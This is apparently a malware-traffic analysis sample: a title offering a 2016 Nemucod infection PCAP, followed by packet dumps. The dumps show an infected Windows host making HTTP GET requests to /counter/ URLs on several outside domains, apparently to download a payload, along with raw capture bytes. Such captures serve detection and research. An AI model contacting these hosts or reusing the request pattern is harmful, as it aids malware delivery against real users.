Nemucod Malware Infection Traffic Analysis Sample PCAP file download 2016

2016-07-17 19:15:21.622089 IP 192.168.2.192.49201 > 185.98.6.167.80: Flags [P.], seq 1:435, ack 1, win 16537, length 434: HTTP: GET /counter/?ad=1AVVD7GmobjKQ2kwZ6Y78x7ittWk9UoWzt&id=TRL98hSr-97s506CCc1jBMTGXw5pR0_9YnRyrfev5DbCheR4ukNptm70Gv17EJtWkBxJHt8UQQ&rnd=01 HTTP/1.1
E…..@…r$…..b…1.P.#]..*..P.@.%…GET /counter/?ad=1AVVD7GmobjKQ2kwZ6Y78x7ittWk9UoWzt&id=TRL98hSr-97s506CCc1jBMTGXw5pR0_9YnRyrfev5DbCheR4ukNptm70Gv17EJtWkBxJHt8UQQ&rnd=01 HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sportstribune.kz
Connection: Keep-Alive


E..n    .@.-..”.b…….P.1.*.+.#^.P…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””””…………………………
“………………………….”………………………….”………………………….”………………………….”………………………….”………………………….”………………………….”…  .  .  .  !  !  .   .  . . “……….!!!!.!!.!!!!…….  “.. … ………………. . . “….. .. !.. !! !! !. … …  “………. !…! .!.!.! .. . . “. .  …..! !! ..!. . … …  “…….!!!.!. !.! !!.!…. . ..”.      !!!!!!!!!!!!!!.!! !!!!!!!!      ..”………………………….”………………………….”………………………..
2016-07-17 19:15:22.264362 IP 192.168.2.192.49202 > 185.98.6.167.80: Flags [P.], seq 1:435, ack 1, win 16537, length 434: HTTP: GET /counter/?ad=1AVVD7GmobjKQ2kwZ6Y78x7ittWk9UoWzt&id=TRL98hSr-97s506CCc1jBMTGXw5pR0_9YnRyrfev5DbCheR4ukNptm70Gv17EJtWkBxJHt8UQQ&rnd=01 HTTP/1.1
E…..@…r……b…2.P.0.p.].lP.@..v..GET /counter/?ad=1AVVD7GmobjKQ2kwZ6Y78x7ittWk9UoWzt&id=TRL98hSr-97s506CCc1jBMTGXw5pR0_9YnRyrfev5DbCheR4ukNptm70Gv17EJtWkBxJHt8UQQ&rnd=01 HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sportstribune.kz
Connection: Keep-Alive

2016-07-17 19:15:24.547360 IP 192.168.2.192.49203 > 176.57.210.37.80: Flags [P.], seq 1:431, ack 1, win 16537, length 430: HTTP: GET /counter/?ad=1AVVD7GmobjKQ2kwZ6Y78x7ittWk9UoWzt&id=TRL98hSr-97s506CCc1jBMTGXw5pR0_9YnRyrfev5DbCheR4ukNptm70Gv17EJtWkBxJHt8UQQ&rnd=11 HTTP/1.1
E…..@….n…..9.%.3.Py…..-QP.@.;…GET /counter/?ad=1AVVD7GmobjKQ2kwZ6Y78x7ittWk9UoWzt&id=TRL98hSr-97s506CCc1jBMTGXw5pR0_9YnRyrfev5DbCheR4ukNptm70Gv17EJtWkBxJHt8UQQ&rnd=11 HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gamefest.biz
Connection: Keep-Alive

2016-07-17 19:15:26.775128 IP 192.168.2.192.49204 > 109.74.8.168.80: Flags [P.], seq 1:450, ack 1, win 16537, length 449: HTTP: G
ET /counter/?ad=1AVVD7GmobjKQ2kwZ6Y78x7ittWk9UoWzt&id=TRL98hSr-97s506CCc1jBMTGXw5pR0_9YnRyrfev5DbCheR4ukNptm70Gv17EJtWkBxJHt8UQQ&
rnd=21 HTTP/1.1
E…
.@………mJ…4.P…D..&1P.@..a..GET /counter/?ad=1AVVD7GmobjKQ2kwZ6Y78x7ittWk9UoWzt&id=TRL98hSr-97s506CCc1jBMTGXw5pR0_9YnRyrfev5DbCheR4ukNptm70Gv17EJtWkBxJHt8UQQ&rnd=21 HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: www.svenskaoljeinvesteringar.se
Connection: Keep-Alive